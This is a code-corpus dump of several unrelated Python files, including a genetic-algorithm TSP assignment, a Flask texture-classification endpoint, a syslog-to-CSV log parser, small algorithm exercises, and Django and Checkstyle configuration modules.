flatten = lambda l: [item for sublist in l for item in sublist]\n r_deep_sub_, d_deep_sub_ = intra_P(sub_dP_, True, True, sub_rdn + 1.2, rng) # deep layers feedback\n d_sub_ += [flatten([flatten(r_deep_sub_), flatten(d_deep_sub_)])]\n\n r_deep_sub_, d_deep_sub_ = intra_P(sub_mP_, False, fid, sub_rdn + 1.2, rng + 1)\n r_sub_ += [flatten([flatten(r_deep_sub_), flatten(d_deep_sub_)])]\n\n if rdn > 1: rdn += 1 / lL - 0.2 # adjust distributed part of estimated rdn\n [len(rsub) for rsub in rsub_]\n'''\n","sub_path":"line_1D_alg/alternative versions/line_bi_d.py","file_name":"line_bi_d.py","file_ext":"py","file_size_in_byte":15033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"118838908","text":"\n\n\"\"\"\nAuthor: Sriranjani Sridharan\nfile: TSP_R00182510.py\n\"\"\"\n\nimport random\nfrom myIndividual import *\nimport sys\n\nmyStudentNum = 182510 # Replace 12345 with your student number\nrandom.seed(myStudentNum)\n\nclass TSP:\n def __init__(self, _fName, _popSize, _mutationRate, _maxIterations,_initial_soln,_selection,_crosssover_type,_mutation_type):\n \"\"\"\n Parameters and general variables\n \"\"\"\n\n self.population = []\n self.matingPool = []\n self.best = None\n self.popSize = _popSize\n self.genSize = None\n self.mutationRate = _mutationRate\n self.maxIterations = 
_maxIterations\n self.iteration = 0\n self.fName = _fName\n self.data = {}\n self.initial_soln = _initial_soln\n self.selection = _selection\n self.crossover_type = _crosssover_type\n self.mutation_type = _mutation_type\n\n self.readInstance()\n\n if self.initial_soln == 'Rand':\n self.initPopulation()\n elif self.initial_soln == 'Heuristic':\n self.heuristicPopulation()\n else:\n print('Incorrect Input - Enter a valid Initial Solution')\n\n\n def readInstance(self):\n \"\"\"\n Reading an instance from fName\n \"\"\"\n file = open(self.fName, 'r')\n self.genSize = int(file.readline())\n self.data = {}\n for line in file:\n (id, x, y) = line.split()\n self.data[int(id)] = (int(x), int(y))\n file.close()\n\n def initPopulation(self):\n \"\"\"\n Creating random individuals in the population\n \"\"\"\n for i in range(0, self.popSize):\n individual = Individual(self.genSize, self.data)\n individual.computeFitness()\n self.population.append(individual)\n\n self.best = self.population[0].copy()\n for ind_i in self.population:\n if self.best.getFitness() > ind_i.getFitness():\n self.best = ind_i.copy()\n print (\"Best initial sol: \",self.best.getFitness())\n\n def heuristicPopulation(self):\n \"\"\"\n Creating heuristic solution based individuals in the population\n \"\"\"\n for i in range(0, self.popSize):\n individual = Individual(self.genSize, self.data)\n genes_old = individual.genes\n ind = random.randint(0, self.genSize-1)\n\n genes_new = [genes_old[ind]]\n del genes_old[ind]\n\n current_gene = genes_new[0]\n while(len(genes_old) > 0):\n Agene = genes_old[0]\n Acost = individual.euclideanDistance(current_gene,Agene)\n Aindex = 0\n for i in range(1,len(genes_old)):\n gene = genes_old[i]\n cost = individual.euclideanDistance(current_gene,gene)\n if Acost > cost:\n Acost = cost\n Agene = gene\n Aindex = i\n current_gene = Agene\n genes_new.append(current_gene)\n del genes_old[Aindex]\n\n individual.setGene(genes_new)\n individual.computeFitness()\n self.population.append(individual)\n\n self.best = self.population[0].copy()\n for ind_i in self.population:\n if self.best.getFitness() > ind_i.getFitness():\n self.best = ind_i.copy()\n print(\"Best initial sol: \", self.best.getFitness())\n\n def updateBest(self, candidate):\n \"\"\"\n print the updated best results as iterations process\n \"\"\"\n if self.best == None or candidate.getFitness() < self.best.getFitness():\n self.best = candidate.copy()\n print (\"iteration: \",self.iteration, \"best: \",self.best.getFitness())\n\n def randomSelection(self):\n \"\"\"\n Random (uniform) selection of two individuals\n \"\"\"\n indA = self.matingPool[ random.randint(0, self.popSize-1) ]\n indB = self.matingPool[ random.randint(0, self.popSize-1) ]\n return [indA, indB]\n\n def stochasticUniversalSampling(self):\n \"\"\"\n Stochastic universal sampling Selection Implementation\n \"\"\"\n\n fitness = []\n indices = []\n fitness_range = [0]\n item = 0\n\n select_num = self.popSize\n\n for ind_i in self.matingPool:\n fitness.append(ind_i.getFitness())\n\n fitness = [1/x for x in fitness]\n fitness_sum = sum(fitness)\n fitness_transformed = [x / fitness_sum for x in fitness]\n fitness_transformed_sum = sum(fitness_transformed)\n\n\n for i in range(len(fitness_transformed)):\n item += fitness_transformed[i]\n fitness_range.append(item)\n\n distance = fitness_transformed_sum / select_num\n pointer = random.uniform(0, distance)\n current_point = pointer\n\n for i in range(select_num):\n for j in range(0, len(fitness_range)):\n if current_point <= 
fitness_range[j]:\n indices.append(j-1)\n break\n current_point += pointer\n\n indA = self.matingPool[random.choice(indices)]\n indB = self.matingPool[random.choice(indices)]\n\n return [indA, indB]\n\n def uniformCrossover(self, indA, indB):\n \"\"\"\n Uniform Crossover Implementation\n \"\"\"\n childA = []\n childB = []\n j = 0\n k = 0\n\n size = random.randint(0, self.genSize-1)\n indices = (random.sample(range(0, self.genSize-1), size))\n indices.sort()\n\n tmpA = [indA.genes[i] for i in indices]\n tmpB = [indB.genes[i] for i in indices]\n\n auxA = [i for i in indB.genes if i not in tmpA]\n auxB = [i for i in indA.genes if i not in tmpB]\n\n for i in range(0, self.genSize):\n if i in indices:\n childA.append(tmpA[j])\n childB.append(tmpB[j])\n j += 1\n else:\n childA.append(auxA[k])\n childB.append(auxB[k])\n k += 1\n return childA,childB\n\n def PMXmap(self,num,tmp1,tmp2):\n \"\"\"\n Mapping of randomly selected genes in PMX Crossover Implementation\n \"\"\"\n for i in range(0, len(tmp1)):\n if num == tmp1[i]:\n temp = tmp2[i]\n if temp in tmp1:\n return self.PMXmap(temp, tmp1, tmp2)\n else:\n return tmp2[i]\n\n\n def pmxCrossover(self, indA, indB):\n \"\"\"\n PMX Crossover Implementation\n \"\"\"\n childA = []\n childB = []\n j = 0\n\n randA = random.randint(0, self.genSize-1)\n randB = random.randint(0, self.genSize-1)\n\n indexA = min(randA, randB)\n indexB = max(randA, randB)\n\n tmpA = [indB.genes[i] for i in range(0, self.genSize) if (i >= indexA and i <= indexB)]\n tmpB = [indA.genes[i] for i in range(0, self.genSize) if (i >= indexA and i <= indexB)]\n\n if indexA == 0 and indexB == self.genSize-1:\n childA = tmpA\n else:\n for i in range(0, self.genSize):\n if i >= indexA and i <= indexB:\n childA.append(tmpA[j])\n j += 1\n else:\n if indA.genes[i] in tmpA:\n mappedA = self.PMXmap(indA.genes[i],tmpA,tmpB)\n childA.append(mappedA)\n else:\n childA.append(indA.genes[i])\n\n j = 0\n if indexA == 0 and indexB == self.genSize-1:\n childB = tmpB\n else:\n for i in range(0, self.genSize):\n if i >= indexA and i <= indexB:\n childB.append(tmpB[j])\n j += 1\n else:\n if indB.genes[i] in tmpB:\n mappedB = self.PMXmap(indB.genes[i],tmpB,tmpA)\n childB.append(mappedB)\n else:\n childB.append(indB.genes[i])\n\n return childA, childB\n\n def reciprocalExchangeMutation(self, ind):\n \"\"\"\n Reciprocal Exchange Mutation implementation\n Mutate an individual with certain probability (i.e., mutation rate)\n \"\"\"\n if random.random() > self.mutationRate:\n return\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n tmp = ind.genes[indexA]\n ind.genes[indexA] = ind.genes[indexB]\n ind.genes[indexB] = tmp\n\n ind.computeFitness()\n self.updateBest(ind)\n\n def inversionMutation(self, ind):\n \"\"\"\n Inversion Mutation implementation\n Mutate an individual with certain probability (i.e., mutation rate)\n \"\"\"\n if random.random() > self.mutationRate:\n return\n tmp = []\n res = []\n j = 0\n\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n indA = min(indexA, indexB)\n indB = max(indexA, indexB)\n\n [tmp.append(ind.genes[i]) for i in range(self.genSize) if (i >= indA and i <= indB)]\n tmp = tmp[::-1]\n\n for i in range(0, self.genSize):\n if i >= indA and i <= indB:\n res.append(tmp[j])\n j += 1\n else:\n res.append(ind.genes[i])\n ind.setGene(res)\n\n ind.computeFitness()\n self.updateBest(ind)\n\n def crossover(self, indA, indB):\n \"\"\"\n Executes a 1 order crossover and returns a new individual\n 
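        Illustrative trace (hypothetical cut points, not from the source): with
        indA.genes = [1, 2, 3, 4, 5], indB.genes = [5, 4, 3, 2, 1] and the random cut
        covering indices 1..2, the genes of A's slice {2, 3} are emitted first in B's
        order, then the remaining genes follow in B's order: child = [3, 2, 5, 4, 1].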
\"\"\"\n child = []\n tmp = {}\n\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n for i in range(0, self.genSize):\n if i >= min(indexA, indexB) and i <= max(indexA, indexB):\n tmp[indA.genes[i]] = False\n else:\n tmp[indA.genes[i]] = True\n aux = []\n for i in range(0, self.genSize):\n if not tmp[indB.genes[i]]:\n child.append(indB.genes[i])\n else:\n aux.append(indB.genes[i])\n child += aux\n return child\n\n def mutation(self, ind):\n \"\"\"\n Mutate an individual by swapping two cities with certain probability (i.e., mutation rate)\n \"\"\"\n if random.random() > self.mutationRate:\n return\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n tmp = ind.genes[indexA]\n ind.genes[indexA] = ind.genes[indexB]\n ind.genes[indexB] = tmp\n\n ind.computeFitness()\n self.updateBest(ind)\n\n def updateMatingPool(self):\n \"\"\"\n Updating the mating pool before creating a new generation\n \"\"\"\n self.matingPool = []\n for ind_i in self.population:\n self.matingPool.append( ind_i.copy() )\n\n def newGeneration(self):\n \"\"\"\n Creating a new generation\n 1. Selection\n 2. Crossover\n 3. Mutation\n \"\"\"\n for i in range(0, int(len(self.population)/2),2):\n \"\"\"\n Depending on the experiment the most suitable algorithms are used for:\n 1. Select two candidates\n 2. Apply Crossover\n 3. Apply Mutation\n \"\"\"\n\n #Selection of Parents\n if self.selection == 'Rand':\n parentA, parentB = self.randomSelection()\n elif self.selection == 'SUS':\n parentA, parentB = self.stochasticUniversalSampling()\n else:\n print('Incorrect Input - Enter a valid selection method')\n\n #Crossover\n if self.crossover_type == 'uniform':\n childA_l,childB_l = self.uniformCrossover(parentA, parentB)\n elif self.crossover_type == 'PMX':\n childA_l,childB_l = self.pmxCrossover(parentA,parentB)\n else:\n print('Incorrect Input - Enter a valid Crossover type')\n\n #Create new Individual-> child\n childA = Individual(self.genSize, self.data)\n childA.setGene(childA_l)\n childB = Individual(self.genSize, self.data)\n childB.setGene(childB_l)\n\n #Mutation\n if self.mutation_type == 'Inv':\n self.inversionMutation(childA)\n self.inversionMutation(childB)\n elif self.mutation_type == 'RecExc':\n self.reciprocalExchangeMutation(childA)\n self.reciprocalExchangeMutation(childB)\n else:\n print('Incorrect Input - Enter a valid Mutation type')\n\n childA.computeFitness()\n childB.computeFitness()\n self.population[i] = childA\n self.population[i+1] = childB\n\n def GAStep(self):\n \"\"\"\n One step in the GA main algorithm\n 1. Updating mating pool with current population\n 2. 
Creating a new Generation\n \"\"\"\n\n self.updateMatingPool()\n self.newGeneration()\n\n def search(self):\n \"\"\"\n General search template.\n Iterates for a given number of steps\n \"\"\"\n self.iteration = 0\n while self.iteration < self.maxIterations:\n self.GAStep()\n self.iteration += 1\n\n print (\"Total iterations: \",self.iteration)\n print (\"Best Solution: \", self.best.getFitness())\n\nif len(sys.argv) < 5:\n print (\"Error - Incorrect input\")\n print (\"Expecting python TSP_R00182510.py [instance] [population size] [mutation rate] [Iterations] \")\n sys.exit(0)\n\n#Refer report to run required experiments for the below assignments\nproblem_file = sys.argv[1]\npop_size = int(sys.argv[2])\nMutation_rate = float(sys.argv[3])\nIteration = int(sys.argv[4])\n\nprint('Problem File : ',problem_file)\nprint('Population size : ',pop_size)\nprint('Mutation rate : ',Mutation_rate)\nprint('Iterations : ',Iteration)\nprint('SUS - num parents selected : popsize')\n\n# To run Configurations 1 or 2 -> uncomment the code between the tags \n# -> comment out the code between tags \n\n# To run Configurations 3 to 8 (any) -> uncomment the code between tags \n# -> comment out the code between tags \n\n#\nprint(\"\\nConfiguration 1 - Random population, Random Selection, Uniform Crossover, Inversion mutation\")\nfor i in range(5):\n ga1 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'Rand', 'uniform', 'Inv')\n ga1.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 2 - Random population, Random Selection, PMX Crossover, Reciprocal Exchange mutation\")\nfor i in range(5):\n ga2 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'Rand', 'PMX', 'RecExc')\n ga2.search()\n print(\"\\n\")\n#\n\n\n#\nprint(\"\\nConfiguration 3 - Random population, Stochastic Universal sampling, uniform crossover, Reciprocal Exchange mutation\")\nfor i in range(5):\n ga3 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'SUS', 'uniform', 'RecExc')\n ga3.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 4 - Random population, Stochastic Universal sampling, PMX Crossover, Reciprocal Exchange mutation\")\nfor i in range(5):\n ga4 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'SUS', 'PMX', 'RecExc')\n ga4.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 5 - Random population, Stochastic Universal sampling, PMX Crossover, Inversion mutation\")\nfor i in range(5):\n ga5 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'SUS', 'PMX', 'Inv')\n ga5.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 6 - Random population, Stochastic Universal sampling, Uniform crossover, Inversion mutation\")\nfor i in range(5):\n ga6 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Rand', 'SUS', 'uniform', 'Inv')\n ga6.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 7 - Heuristic population, Stochastic Universal sampling, PMX crossover, Reciprocal Exchange\")\nfor i in range(5):\n ga7 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Heuristic', 'SUS', 'PMX', 'RecExc')\n ga7.search()\n print(\"\\n\")\n\nprint(\"\\nConfiguration 8 - Heuristic population, Stochastic Universal sampling, Uniform crossover, Inversion mutation\")\nfor i in range(5):\n ga8 = TSP(sys.argv[1], pop_size, Mutation_rate, Iteration, 'Heuristic', 'SUS', 'uniform', 'Inv')\n ga8.search()\n print(\"\\n\")\n#","sub_path":"Metaheuristics/Assignment 
1/Submission/myTSP_toStudents_V4.py","file_name":"myTSP_toStudents_V4.py","file_ext":"py","file_size_in_byte":16637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324280873","text":"from flask import Flask, request, abort, jsonify\nimport numpy as np\nimport glob\nfrom PIL import Image, ImageFile\nfrom skimage.feature import greycomatrix, greycoprops\nimport pickle\nfrom os.path import isfile\nfrom io import BytesIO\nimport base64\nimport os\nfrom flask_cors import CORS, cross_origin\nimport random\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef extract_feature(path):\n img = Image.open(path)\n img = img.resize([128, 128])\n img = img.convert('L')\n img = np.array(img)\n feature = []\n glcm = greycomatrix(\n img, [4, 5], [0, np.pi/4, np.pi/2, 3*np.pi/4], symmetric=True, normed=False)\n contrast = greycoprops(glcm, 'contrast')\n homogeneity = greycoprops(glcm, 'homogeneity')\n energy = greycoprops(glcm, 'energy')\n asm = greycoprops(glcm, 'ASM')\n feature.append(contrast[0][0])\n feature.append(contrast[0][1])\n feature.append(contrast[0][2])\n feature.append(contrast[0][3])\n\n feature.append(homogeneity[0][0])\n feature.append(homogeneity[0][1])\n feature.append(homogeneity[0][2])\n feature.append(homogeneity[0][3])\n\n feature.append(energy[0][0])\n feature.append(energy[0][1])\n feature.append(energy[0][2])\n feature.append(energy[0][3])\n\n feature.append(asm[0][0])\n feature.append(asm[0][1])\n feature.append(asm[0][2])\n feature.append(asm[0][3])\n return feature\n\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\n@app.route('/')\n@app.route('/index')\n@cross_origin()\ndef index():\n return \"Hello World\"\n\n\n@app.route('/proses', methods=['GET', 'POST'])\n@cross_origin()\ndef proses():\n if request.method == \"POST\":\n result = \"\"\n random_int = [100]\n presentase = random_int[random.randint(0, len(random_int) - 1)]\n if 'file' not in request.files:\n result = \"No File\"\n else:\n file = request.files['file']\n if file.filename == '':\n result = \"No File\"\n if file and allowed_file(file.filename):\n file_predict = extract_feature(file)\n loaded_model = pickle.load(open('./finalized_model.sav', 'rb'))\n predict = loaded_model.predict(np.array([file_predict]))\n if predict[0] == 0:\n result = \"Kambing\"\n elif predict[0] == 1:\n result = \"Oplosan\"\n else:\n presentase = 0\n result = \"Tidak Terindentifikasi\"\n return jsonify({\"result\": result, \"presentase\": \"{}%\".format(presentase)}), 200\n else:\n return \"Hello World\"\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479459409","text":"#!/usr/bin/env python3\n\nimport re\nimport csv\nimport operator\n\nerror_ranking = {}\nuser_entries = {}\n\ninfo_pattern = r\"ticky: INFO ([\\w ]*) .*\\(([\\w\\.]+)\\)\"\nerror_pattern = r\"ticky: ERROR ([\\w ]*) .*\\(([\\w\\.]+)\\)\"\n\nwith open(\"syslog.log\") as f:\n for line in f.readlines():\n print(line.strip())\n error = re.search(error_pattern, line)\n info = re.search(info_pattern, line)\n if not error is None:\n error_ranking[error.group(1)] = error_ranking.get(error.group(1), 0) + 1\n if 
error.group(2) in user_entries.keys():\n user_entries[error.group(2)][\"ERROR\"] = user_entries[error.group(2)].get(\"ERROR\", 0) + 1\n else:\n user_entries[error.group(2)] = {}\n user_entries[error.group(2)][\"ERROR\"] = 1\n user_entries[error.group(2)][\"INFO\"] = 0\n if not info is None:\n if info.group(2) in user_entries.keys():\n user_entries[info.group(2)][\"INFO\"] = user_entries[info.group(2)].get(\"INFO\", 0) + 1\n else:\n user_entries[info.group(2)] = {}\n user_entries[info.group(2)][\"INFO\"] = 1\n user_entries[info.group(2)][\"ERROR\"] = 0\n\n f.close()\n\nerror_ranking = sorted(error_ranking.items(), key=operator.itemgetter(1), reverse=True)\nuser_entries = sorted(user_entries.items(), key=operator.itemgetter(0))\n\nwith open(\"error_message.csv\", \"w\") as error_file:\n writer = csv.DictWriter(error_file, fieldnames=[\"Error\", \"Count\"])\n writer.writeheader()\n for error in error_ranking:\n writer.writerow({\"Error\": error[0], \"Count\": error[1]})\n error_file.close()\n\nwith open(\"user_statistics.csv\", \"w\") as user_file:\n writer = csv.DictWriter(user_file, fieldnames=[\"Username\", \"INFO\", \"ERROR\"])\n writer.writeheader()\n for user in user_entries:\n writer.writerow({\"Username\": user[0], \"INFO\": user[1][\"INFO\"], \"ERROR\": user[1][\"ERROR\"]})\n user_file.close()\n\n","sub_path":"ticky_check.py","file_name":"ticky_check.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"367367","text":"\"\"\"\nGiven an array of 2n integers, \nyour task is to group these integers into n pairs of integer, \nsay (a1, b1), (a2, b2), ..., (an, bn) which makes sum of min(ai, bi) \nfor all i from 1 to n as large as possible.\n\nExample 1:\nInput: [1,4,3,2]\nOutput: 4\nExplanation: n is 2, and the maximum sum of pairs is 4 = min(1, 2) + min(3, 4).\n\"\"\"\n\n\ndef arrayPairSum(nums):\n sum_min = 0\n nums.sort()\n for i in range(0, len(nums), 2):\n sum_min += nums[i]\n # sum_min += sum(nums[0::2])\n\n return sum_min\n\n\narr = [1, 4, 3, 2]\nprint(arrayPairSum(arr))\n","sub_path":"array_pair_sum.py","file_name":"array_pair_sum.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309568639","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'jblab.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url('^', include('django.contrib.auth.urls')),\n # url(r'^accounts/login/$', 'django.contrib.auth.views.login'),\n # url(r'^accounts/logout/$', 'django.contrib.auth.views.logout'),\n\n url(r'^$', include('home.urls', namespace=\"home\")),\n url(r'^research/', include('research.urls', namespace=\"research\")),\n url(r'^publications/', include('publications.urls', namespace=\"publications\")),\n url(r'^members/', include('members.urls', namespace=\"members\")),\n url(r'^photos/', include('photos.urls', namespace=\"photos\")),\n\n url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"jblab/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"514644272","text":"# third party imports\nfrom nautilus import ConnectionService\n\n# import the services to connect\nfrom recipe_book.ingredient import service as ingredient_service\nfrom recipe_book.recipe import service as 
recipe_service\n\nclass ServiceConfig:\n SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/ingredientRecipe.db'\n\nservice = ConnectionService(\n configObject=ServiceConfig,\n services=[\n ingredient_service,\n recipe_service,\n ]\n)\n","sub_path":"recipe_book/ingredientRecipe/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"410514783","text":"class Solution:\r\n # @param num, a list of integer\r\n # @return a list of lists of integers\r\n def permute(self, num):\r\n \"\"\"\r\n Third iteration\r\n \"\"\"\r\n return self.addOne(len(num) - 1, num)\r\n\r\n def addOne(self, i, num):\r\n if i == 0:\r\n return [[num[0]]]\r\n assert i > 0\r\n res, perms = [], self.addOne(i - 1, num)\r\n for p in perms:\r\n for j in reversed(range(len(p) + 1)):\r\n t = p[:j] + [num[i]] + p[j:]\r\n res.append(t)\r\n return res\r\n\r\ndef run():\r\n sol = Solution()\r\n ret = sol.permute([1,2,3])\r\n assert ret == [[1, 2, 3], [1, 3, 2], [3, 1, 2], [2, 1, 3], [2, 3, 1], [3, 2, 1]]\r\n","sub_path":"046-permutations.py","file_name":"046-permutations.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"335541140","text":"from os.path import join\nimport sys\n\nANALYSIS_PATH = '/Users/idan/src/analysis_utils'\nsys.path.append(ANALYSIS_PATH)\n\nfrom cochange_analysis import the_lower_the_better, the_higher_the_better\n\nREPOS_DIRECTORY = r'C:\\\\github-repos\\\\'\nCHECKSTYLE_LOGS_DIRECTORY = r'C:\\Users\\Nili\\Documents\\GitHub\\hotspots\\data\\agg-checkstyle-logs'\nCHECKSTYLE_ERROR_FILE = r\"C:\\Users\\Nili\\Documents\\GitHub\\hotspots\\data\\err_java_dir.txt\"\n\nBASE_PATH = r'/Users/idan/src/follow-your-nose/'\nDATA_PATH = BASE_PATH + r'data/'\nFIGURES_PATH = BASE_PATH + r'figures/'\nPERFORMANCE_PATH = BASE_PATH + r'performance/'\nMODELS_PATH = BASE_PATH + r'models/'\n\nBQ_PREFIX = 'java_repos_file_properties_'\n# Important files constants\nBQ_PROPERTIES_FILE = BQ_PREFIX + '2019.csv'\nBQ_ALL_YEARS = 'java_repos_file_properties_per_year.csv'\n\nSMELLS_PREFIX = 'hotspots_agg_1_1_'\nCHECKSTYLE_AGG_FILE = SMELLS_PREFIX + r'2019.csv'\nBINARY_CHECKSTYLE_AGG_FILE = r'binary_hotspots_agg.csv'\n\n\nDATASET_FILE = r'hotspots_joint.csv'\nBINARY_DATASET_FILE = r'binary_hotspots_joint.csv'\n\nALL_YEARS_DATASET = r'all_years_hotspots_joint.csv'\nBINARY_ALL_YEARS_DATASET = r'all_years_binary_hotspots_joint.csv'\n\nMONOTONICITY_STATS_FILE = 'monotonicity.csv'\nCOHANGE_STATS_FILE = 'smell_cohcnage_stats.csv'\nAUTHOR_TWIN_CM_FILE = 'file_by_author_twin_cm.csv'\nLENGTH_PEARSON_STATS = 'length_pearson_stats.csv'\nSMELL_REMOVAL_FILE = 'smell_removal_stats.csv'\nJOINT_STATS_FILE = 'joint_feature_stats.csv'\n\n\nNON_SMELLS = ['line_count_100', 'avg_coupling_java_size', 'avg_coupling_size_capped','avg_coupling_size'\n , 'avg_coupling_java_size_capped', 'commit_count', 'authors', 'commits', 'line_count',]\nADMINISTRATIVE_FEATURES = ['repository', 'file', 'filename', 'repo_name', 'full_file_name', 'file_name', 'year'\n ,'Author_email', 'fake_date', 'user', 'project']\n\nSINGLE_SMELL = ['ReturnCount',\n 'JavadocPackage',\n 'OverloadMethodsDeclarationOrder',\n 'MissingCtor',\n 'ArrayTrailingComma',\n 'TypeName',\n 'OneStatementPerLine',\n 'SeparatorWrap',\n 'AbstractClassName',\n 'LocalVariableName',\n 'BooleanExpressionComplexity',\n 'ImportControl',\n 'ParameterName',\n 'NoFinalizer',\n 'MethodName',\n 'TypecastParenPad',\n 
'SingleLineJavadoc',\n 'FileTabCharacter',\n 'InvalidJavadocPosition',\n 'LeftCurly',\n 'UnnecessarySemicolonInEnumeration',\n 'VisibilityModifier',\n 'SummaryJavadoc',\n 'IllegalImport',\n 'NestedForDepth',\n 'StaticVariableName',\n 'MissingJavadocPackage',\n 'Indentation',\n 'UnnecessaryParentheses',\n 'EmptyCatchBlock',\n 'HiddenField',\n 'InterfaceIsType',\n 'EmptyForIteratorPad',\n 'IllegalToken',\n 'JavaNCSS',\n 'NonEmptyAtclauseDescription',\n 'FinalParameters',\n 'ClassTypeParameterName',\n 'FileLength',\n 'OuterTypeFilename',\n 'MissingSwitchDefault',\n 'ParenPad',\n 'MultipleVariableDeclarations',\n 'EqualsHashCode',\n 'WriteTag',\n 'MethodTypeParameterName',\n 'AbbreviationAsWordInName',\n 'VariableDeclarationUsageDistance',\n 'ClassMemberImpliedModifier',\n 'CatchParameterName',\n 'NestedTryDepth',\n 'AtclauseOrder',\n 'RedundantImport',\n 'IllegalThrows',\n 'AnonInnerLength',\n 'CustomImportOrder',\n 'OneTopLevelClass',\n 'AvoidEscapedUnicodeCharacters',\n 'JavadocMethod',\n 'DeclarationOrder',\n 'ModifierOrder',\n 'AvoidInlineConditionals',\n 'DefaultComesLast',\n 'InnerTypeLast',\n 'ArrayTypeStyle',\n 'InterfaceTypeParameterName',\n 'MethodLength',\n 'UpperEll',\n 'MissingDeprecated',\n 'EmptyForInitializerPad',\n 'JavadocVariable',\n 'SimplifyBooleanExpression',\n 'HideUtilityClassConstructor',\n 'WhitespaceAfter',\n 'SuperFinalize',\n 'OperatorWrap',\n 'UnusedImports',\n 'AvoidStarImport',\n 'AvoidStaticImport',\n 'NeedBraces',\n 'MutableException',\n 'NoLineWrap',\n 'TrailingComment',\n 'AnnotationUseStyle',\n 'Regexp',\n 'TodoComment',\n 'RedundantModifier',\n 'AvoidNestedBlocks',\n 'ClassFanOutComplexity',\n 'ConstantName',\n 'PackageName',\n 'ModifiedControlVariable',\n 'RequireThis',\n 'InnerAssignment',\n 'NestedIfDepth',\n 'InterfaceMemberImpliedModifier',\n 'DesignForExtension',\n 'MissingJavadocMethod',\n 'PackageDeclaration',\n 'UnnecessarySemicolonInTryWithResources',\n 'NPathComplexity',\n 'JavadocType',\n 'SuppressWarnings',\n 'ClassDataAbstractionCoupling',\n 'JavadocParagraph',\n 'FallThrough',\n 'IllegalType',\n 'LineLength',\n 'NoWhitespaceAfter',\n 'MissingOverride',\n 'UncommentedMain',\n 'JavadocTagContinuationIndentation',\n 'GenericWhitespace',\n 'EmptyLineSeparator',\n 'ParameterAssignment',\n 'JavadocStyle',\n 'RegexpOnFilename',\n 'ExplicitInitialization',\n 'LocalFinalVariableName',\n 'SingleSpaceSeparator',\n 'ParameterNumber',\n 'NoWhitespaceBefore',\n 'RightCurly',\n 'EmptyStatement',\n 'ThrowsCount',\n 'LambdaParameterName',\n 'EmptyBlock',\n 'StringLiteralEquality',\n 'CovariantEquals',\n 'MethodParamPad',\n 'CommentsIndentation',\n 'ExecutableStatementCount',\n 'MethodCount',\n 'MagicNumber',\n 'FinalClass',\n 'FinalLocalVariable',\n 'NewlineAtEndOfFile',\n 'EqualsAvoidNull',\n 'MemberName',\n 'AnnotationOnSameLine',\n 'SimplifyBooleanReturn',\n 'SuperClone',\n 'AnnotationLocation',\n 'WhitespaceAround',\n 'IllegalCatch',\n 'MultipleStringLiterals',\n 'ImportOrder',\n 'MissingJavadocType',\n 'NoClone',\n 'OuterTypeNumber',\n 'CyclomaticComplexity']\n\nNON_PREDICTIVE_FEATURES = set(['extension', 'is_test','bug_count', 'bug_hit_ratio', 'min_commit_in_year', 'extension'\n , 'is_test', 'corrective_commits', 'corrective_rate', 'file_ccp','length_group','quality_group'\n , 'worse_10_hs', 'concept'] + ADMINISTRATIVE_FEATURES + NON_SMELLS #+ SINGLE_SMELL\n ) # TODO - return groups as numbers\n\nexcluded_columns = ['line_count', 'commit_count', 'bug_count', 'bug_hit_ratio',\n 'min_commit_in_year', 'extension', 'is_test',\n 'commits', 
